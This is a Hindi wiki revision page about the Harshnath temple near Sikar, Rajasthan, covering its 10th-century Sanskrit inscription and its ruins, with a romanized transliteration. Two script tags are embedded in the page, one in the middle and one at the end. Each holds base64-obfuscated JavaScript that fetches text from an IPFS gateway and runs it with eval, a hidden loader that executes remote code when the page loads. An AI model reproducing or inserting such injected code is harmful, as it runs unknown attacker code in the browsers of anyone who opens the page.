Difference between revisions of "हर्षनाथ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(हर्षनाथ का नाम बदलकर हर्षनाथ नगर कर दिया गया है)
 
Line 1: Line 1:
#REDIRECT [[हर्षनाथ नगर]]
+
[[चित्र:Harshnath-Temple.jpg|thumb|[[शिव]], हर्षनाथ मंदिर]]
 +
'''हर्षनाथ''' [[राजस्थान]] राज्य में [[सीकर ज़िला|सीकर ज़िले]] के निकट स्थित एक ऐतिहासिक मंदिर है।
 +
*स्थानीय [[अनुश्रुति]] के अनुसार यह स्थान पूर्वकाल में 36 मील के घेरे में बसा हुआ था।
 +
*वर्तमान में हर्षनाथ नामक ग्राम हर्षगिरि पहाड़ी की तलहटी में बसा हुआ है और सीकर से प्रायः आठ मील दक्षिण-पूर्व में हैं।
 +
*हर्षगिरि ग्राम के पास हर्षगिरि नामक पहाड़ी है, जो 3,000 फुट ऊँची है और इस पर लगभग 900 वर्ष से अधिक प्राचीन मंदिरों के खण्डहर हैं।
 +
*इन मंदिरों में एक काले पत्थर पर उत्कीर्ण लेख प्राप्त हुआ है, जो शिवस्तुति से प्रारम्भ होता है और जो पौराणिक कथा के रूप में लिखा गया है लेख में हर्षगिरि और मन्दिर का वर्णन है और इसमें कहा गया है कि मन्दिर के निर्माण का कार्य [[आषाढ़]] [[शुक्ल पक्ष|शुक्ल]] [[त्रयोदशी]], [[सोमवार]] 1030 [[विक्रम सम्वत|विक्रम सम्वत्]] (956 ई.) को प्रारम्भ होकर विग्रहराज चौहान के समय में 1030 विक्रम सम्वत (973 ई.)  को पूरा हुआ था।
 +
*यह लेख [[संस्कृत]] में है और इसे रामचन्द्र नामक [[कवि]] ने लेखबद्ध किया था।
 +
*मंदिर के [[भग्नावशेष|भग्नावशेषों]] में अनेक सुंदर कलापूर्ण मूर्तियाँ तथा स्तंभ आदि प्राप्त हुए हैं, जिनमें से अधिकांश सीकर के संग्रहालय में सुरक्षित हैं। 
 +
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 +
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 +
==संबंधित लेख==
 +
{{राजस्थान के ऐतिहासिक स्थान}}
 +
[[Category:हिन्दू धार्मिक स्थल]][[Category:धार्मिक स्थल कोश]]
 +
[[Category:राजस्थान]][[Category:राजस्थान के धार्मिक स्थल]][[Category:राजस्थान के ऐतिहासिक स्थान]][[Category:ऐतिहासिक_स्थान_कोश]]
 +
__INDEX__

Revision as of 05:38, 6 August 2012

[[chitr:Harshnath-Temple.jpg|thumb|shiv, harshanath mandir]] harshanath rajasthan rajy mean sikar zile ke nikat sthit ek aitihasik mandir hai.

  • sthaniy anushruti ke anusar yah sthan poorvakal mean 36 mil ke ghere mean basa hua tha.
  • vartaman mean harshanath namak gram harshagiri paha di ki talahati mean basa hua hai aur sikar se prayah ath mil dakshin-poorv mean haian.
  • harshagiri gram ke pas harshagiri namak paha di hai, jo 3,000 phut ooanchi hai aur is par lagabhag 900 varsh se adhik prachin mandiroan ke khandahar haian.
  • in mandiroan mean ek kale patthar par utkirn lekh prapt hua hai, jo shivastuti se prarambh hota hai aur jo pauranik katha ke roop mean likha gaya hai lekh mean harshagiri aur mandir ka varnan hai aur isamean kaha gaya hai ki mandir ke nirman ka kary ashadh shukl trayodashi, somavar 1030 vikram samvath (956 ee.) ko prarambh hokar vigraharaj chauhan ke samay mean 1030 vikram samvat (973 ee.) ko poora hua tha.
  • yah lekh sanskrit mean hai aur ise ramachandr namak kavi ne lekhabaddh kiya tha.
  • mandir ke bhagnavasheshoan mean anek suandar kalapoorn moortiyaan tatha stanbh adi prapt hue haian, jinamean se adhikaansh sikar ke sangrahalay mean surakshit haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>